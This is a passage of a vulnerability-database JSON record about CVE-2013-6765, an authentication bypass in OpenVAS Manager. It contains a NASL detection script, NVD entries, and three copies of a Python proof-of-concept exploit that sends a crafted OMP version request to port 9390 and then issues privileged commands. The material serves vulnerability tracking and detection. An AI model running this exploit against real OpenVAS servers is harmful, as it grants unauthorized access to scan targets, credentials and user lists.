WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:openvas:openvas_manager\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103827\");\n script_version(\"$Revision: 13876 $\");\n script_cve_id(\"CVE-2013-6765\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-02-26 13:04:06 +0100 (Tue, 26 Feb 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-11-08 13:02:55 +0200 (Fri, 08 Nov 2013)\");\n script_name(\"OpenVAS Manager Authentication Bypass\");\n script_category(ACT_GATHER_INFO);\n script_family(\"General\");\n script_copyright(\"This script is Copyright (C) 2013 Greenbone Networks GmbH\");\n script_dependencies(\"gb_openvas_manager_detect.nasl\");\n script_require_ports(\"Services/omp_gmp\", 9390);\n script_mandatory_keys(\"openvasmd_gvmd/detected\");\n script_exclude_keys(\"greenbone/gos/detected\");\n\n script_xref(name:\"URL\", value:\"http://openvas.org/OVSA20131108.html\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit these issues to gain unauthorized access to the\n affected application and perform certain actions.\");\n\n script_tag(name:\"vuldetect\", value:\"Try to bypass OMP authentication by sending a special crafted request.\");\n\n script_tag(name:\"insight\", value:\"A software bug in the server module 'OpenVAS Manager' allowed to bypass the OMP\n authentication procedure. The attack vector is remotely available in case public OMP is enabled.\n In case of successful attack, the attacker gains partial rights to execute OMP commands. The bypass\n authentication is, however, incomplete and several OMP commands will fail to execute properly.\");\n\n script_tag(name:\"solution\", value:\"Update to version 3.0.7 or 4.0.4.\");\n\n script_tag(name:\"summary\", value:\"The remote OpenVAS Manager is prone to an authentication bypass.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\n\nif( get_kb_item( \"greenbone/gos/detected\" ) )\n exit( 0 ); # there is an extra nvt gb_gsm_manager_auth_bypass_11_13.nasl for the gsm\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit( 0 );\n\nif( ! get_app_location( port:port, cpe:CPE ) )\n exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( ! soc )\n exit( 0 );\n\nreq = \"<get_version/><get_targets/>\";\nsend( socket:soc, data:req + '\\r\\n' );\nres = recv( socket:soc, length:1024 );\nclose( soc );\n\nif( \"get_targets_response\" >< res && \"target id\" >< res ) {\n report = 'By sending the request \"' + req + '\" to the remote OMP service it was possible to bypass the authentication. Response:\\n\\n' + res;\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "cve": [{"lastseen": "2022-03-23T14:44:45", "description": "OpenVAS Administrator 1.2 before 1.2.2 and 1.3 before 1.3.2 allows remote attackers to bypass the OAP authentication restrictions and execute OAP commands via a crafted OAP request for version information, which causes the state to be set to CLIENT_AUTHENTIC.", "cvss3": {}, "published": "2014-05-19T14:55:00", "type": "cve", "title": "CVE-2013-6766", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6766"], "modified": "2014-05-20T11:37:00", "cpe": ["cpe:/a:openvas:openvas_administrator:1.3.0", "cpe:/a:openvas:openvas_administrator:1.2", "cpe:/a:openvas:openvas_administrator:1.2.1", "cpe:/a:openvas:openvas_administrator:1.3", "cpe:/a:openvas:openvas_administrator:1.2.0", "cpe:/a:openvas:openvas_administrator:1.3.1"], "id": "CVE-2013-6766", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6766", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openvas:openvas_administrator:1.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.2:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.3:beta1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_administrator:1.2.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:44:43", "description": "OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote attackers to bypass the OMP authentication restrictions and execute OMP commands via a crafted OMP request for version information, which causes the state to be set to CLIENT_AUTHENTIC, as demonstrated by the omp_xml_handle_end_element function in omp.c.", "cvss3": {}, "published": "2014-05-19T14:55:00", "type": "cve", "title": "CVE-2013-6765", "cwe": ["CWE-287"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6765"], "modified": "2014-05-19T19:03:00", "cpe": ["cpe:/a:openvas:openvas_manager:3.0", "cpe:/a:openvas:openvas_manager:4.0.2", "cpe:/a:openvas:openvas_manager:3.0.2", "cpe:/a:openvas:openvas_manager:4.0", "cpe:/a:openvas:openvas_manager:3.0.4", "cpe:/a:openvas:openvas_manager:3.0.6", "cpe:/a:openvas:openvas_manager:4.0.1", "cpe:/a:openvas:openvas_manager:3.0.5", "cpe:/a:openvas:openvas_manager:4.0.0", "cpe:/a:openvas:openvas_manager:3.0.3", "cpe:/a:openvas:openvas_manager:3.0.0", "cpe:/a:openvas:openvas_manager:4.0.3", "cpe:/a:openvas:openvas_manager:3.0.1"], "id": "CVE-2013-6765", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6765", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:openvas:openvas_manager:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:openvas:openvas_manager:3.0:beta7:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:44:43", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2013-6795. Reason: This candidate is a duplicate of CVE-2013-6795. A typo in an external publication caused this ID to be associated with the wrong vulnerability. Notes: All CVE users should reference CVE-2013-6795 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "cvss3": {}, "published": "2014-05-19T14:55:00", "type": "cve", "title": "CVE-2013-6764", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2013-6764", "CVE-2013-6795"], "modified": "2014-05-19T14:55:00", "cpe": [], "id": "CVE-2013-6764", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6764", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "zdt": [{"lastseen": "2018-03-14T09:20:14", "description": "OpenVAS Manager 3.0 before 3.0.7 and 4.0 before 4.0.4 allows remote attackers to bypass the OMP authentication restrictions and execute OMP commands via a crafted OMP request for version information, which causes the state to be set to CLIENT_AUTHENTIC, as demonstrated by the omp_xml_handle_end_element function in omp.c.", "cvss3": {}, "published": "2014-07-21T00:00:00", "type": "zdt", "title": "OpenVAS Manager 4.0 - Authentication Bypass Vulnerability PoC", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2013-6765"], "modified": "2014-07-21T00:00:00", "id": "1337DAY-ID-22456", "href": "https://0day.today/exploit/description/22456", "sourceData": "#!/usr/bin/python\r\n \r\n# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC\r\n# Date: 09/07/2014\r\n# Exploit Author: EccE\r\n# Vendor Homepage: http://www.openvas.org/\r\n# Software Link: http://wald.intevation.org/frs/?group_id=29\r\n# Version: OpenVAS Manager 4.0\r\n# Tested on: Debian GNU/Linux testing (jessie)\r\n# CVE : CVE-2013-6765\r\n \r\n\"\"\"\r\n Small list of working commands\r\n \r\nget_agents\r\nget_configs\r\nget_alerts\r\nget_filters\r\nget_lsc_credentials\r\nget_notes\r\nget_nvts\r\nget_targets\r\nget_users\r\nget_schedules\r\n \r\n \r\nMore commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though.\r\nAs designed in OMP protocol, commands must be sent this way : <COMMAND/>\r\n \r\n\"\"\"\r\n \r\nimport socket, ssl\r\n \r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n \r\n# Require a certificate from the server. We used a self-signed certificate\r\n# so here cacerts.pem must be the server certificate itself.\r\nssl_sock = ssl.wrap_socket(s,\r\n ca_certs=\"/var/lib/openvas/CA/cacert.pem\",\r\n cert_reqs=ssl.CERT_REQUIRED)\r\n \r\n# OpenVAS Manager listen by default on localhost tcp/9390\r\nssl_sock.connect(('localhost', 9390))\r\n \r\n \r\nprint \"#################################################################\"\r\nprint \"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #\"\r\nprint \"#################################################################\"\r\nprint \"\\n\"\r\n \r\nprint \"--> Retrieving version...(exploiting the bug !)\\n\"\r\nssl_sock.write(\"<get_version/>\")\r\ndata = ssl_sock.read()\r\nprint data\r\nprint \"\\n\"\r\n \r\n \r\nprint \"--> Retrieving slaves...\\n\"\r\nssl_sock.write(\"<get_slaves/>\")\r\ntasks = ssl_sock.read()\r\nprint tasks\r\nprint \"\\n\"\r\n \r\n\"\"\"\r\nprint \"--> Creating note...\\n\"\r\nssl_sock.write(\"<create_note/>\")\r\nnote = ssl_sock.read()\r\nprint note\r\n \r\nprint \"--> Retrieving users list...\\n\"\r\nssl_sock.write(\"<get_users/>\")\r\nusers_list = ssl_sock.read()\r\nprint users_list\r\n\"\"\"\r\nssl_sock.close()\n\n# 0day.today [2018-03-14] #", "sourceHref": "https://0day.today/exploit/22456", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenVAS Manager 4.0 - Authentication Bypass", "edition": 2, "published": "2014-07-10T00:00:00", "title": "OpenVAS Manager 4.0 - Authentication Bypass", "type": "exploitpack", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-6765"], "modified": "2014-07-10T00:00:00", "id": "EXPLOITPACK:2D2D48F68F9CEE070A2756D39113B224", "href": "", "sourceData": "#!/usr/bin/python\n\n# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC \n# Date: 09/07/2014\n# Exploit Author: EccE\n# Vendor Homepage: http://www.openvas.org/\n# Software Link: http://wald.intevation.org/frs/?group_id=29\n# Version: OpenVAS Manager 4.0 \n# Tested on: Debian GNU/Linux testing (jessie)\n# CVE : CVE-2013-6765\n\n\"\"\"\t\n\tSmall list of working commands\n\nget_agents \nget_configs \nget_alerts\nget_filters\nget_lsc_credentials \nget_notes \nget_nvts \nget_targets\nget_users\nget_schedules\n\n\nMore commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though. \nAs designed in OMP protocol, commands must be sent this way : <COMMAND/>\n\n\"\"\"\n\nimport socket, ssl\n\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\n# Require a certificate from the server. We used a self-signed certificate\n# so here cacerts.pem must be the server certificate itself.\nssl_sock = ssl.wrap_socket(s,\n ca_certs=\"/var/lib/openvas/CA/cacert.pem\", \n cert_reqs=ssl.CERT_REQUIRED)\n\n# OpenVAS Manager listen by default on localhost tcp/9390\nssl_sock.connect(('localhost', 9390))\n\n\nprint \"#################################################################\"\nprint \"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #\"\nprint \"#################################################################\"\nprint \"\\n\"\n\nprint \"--> Retrieving version...(exploiting the bug !)\\n\"\nssl_sock.write(\"<get_version/>\")\ndata = ssl_sock.read()\nprint data\nprint \"\\n\"\n\n\nprint \"--> Retrieving slaves...\\n\"\nssl_sock.write(\"<get_slaves/>\")\ntasks = ssl_sock.read()\nprint tasks\nprint \"\\n\"\n\n\"\"\"\nprint \"--> Creating note...\\n\"\nssl_sock.write(\"<create_note/>\")\nnote = ssl_sock.read()\nprint note \n\nprint \"--> Retrieving users list...\\n\"\nssl_sock.write(\"<get_users/>\")\nusers_list = ssl_sock.read()\nprint users_list\n\"\"\"\nssl_sock.close()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2022-05-04T17:44:04", "description": "", "cvss3": {}, "published": "2014-07-10T00:00:00", "type": "exploitdb", "title": "OpenVAS Manager 4.0 - Authentication Bypass", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["2013-6765", "CVE-2013-6765"], "modified": "2014-07-10T00:00:00", "id": "EDB-ID:34026", "href": "https://www.exploit-db.com/exploits/34026", "sourceData": "#!/usr/bin/python\r\n\r\n# Exploit Title: OpenVAS Manager 4.0 Authentication Bypass Vulnerability PoC \r\n# Date: 09/07/2014\r\n# Exploit Author: EccE\r\n# Vendor Homepage: http://www.openvas.org/\r\n# Software Link: http://wald.intevation.org/frs/?group_id=29\r\n# Version: OpenVAS Manager 4.0 \r\n# Tested on: Debian GNU/Linux testing (jessie)\r\n# CVE : CVE-2013-6765\r\n\r\n\"\"\"\t\r\n\tSmall list of working commands\r\n\r\nget_agents \r\nget_configs \r\nget_alerts\r\nget_filters\r\nget_lsc_credentials \r\nget_notes \r\nget_nvts \r\nget_targets\r\nget_users\r\nget_schedules\r\n\r\n\r\nMore commands (~70 commands) can be found directly in the omc.c file. Not all of them are working though. \r\nAs designed in OMP protocol, commands must be sent this way : <COMMAND/>\r\n\r\n\"\"\"\r\n\r\nimport socket, ssl\r\n\r\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n\r\n# Require a certificate from the server. We used a self-signed certificate\r\n# so here cacerts.pem must be the server certificate itself.\r\nssl_sock = ssl.wrap_socket(s,\r\n ca_certs=\"/var/lib/openvas/CA/cacert.pem\", \r\n cert_reqs=ssl.CERT_REQUIRED)\r\n\r\n# OpenVAS Manager listen by default on localhost tcp/9390\r\nssl_sock.connect(('localhost', 9390))\r\n\r\n\r\nprint \"#################################################################\"\r\nprint \"# Proof of Concept - OpenVAS Manager 4.0 Authentication Bypass #\"\r\nprint \"#################################################################\"\r\nprint \"\\n\"\r\n\r\nprint \"--> Retrieving version...(exploiting the bug !)\\n\"\r\nssl_sock.write(\"<get_version/>\")\r\ndata = ssl_sock.read()\r\nprint data\r\nprint \"\\n\"\r\n\r\n\r\nprint \"--> Retrieving slaves...\\n\"\r\nssl_sock.write(\"<get_slaves/>\")\r\ntasks = ssl_sock.read()\r\nprint tasks\r\nprint \"\\n\"\r\n\r\n\"\"\"\r\nprint \"--> Creating note...\\n\"\r\nssl_sock.write(\"<create_note/>\")\r\nnote = ssl_sock.read()\r\nprint note \r\n\r\nprint \"--> Retrieving users list...\\n\"\r\nssl_sock.write(\"<get_users/>\")\r\nusers_list = ssl_sock.read()\r\nprint users_list\r\n\"\"\"\r\nssl_sock.close()", "sourceHref": "https://www.exploit-db.com/download/34026", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
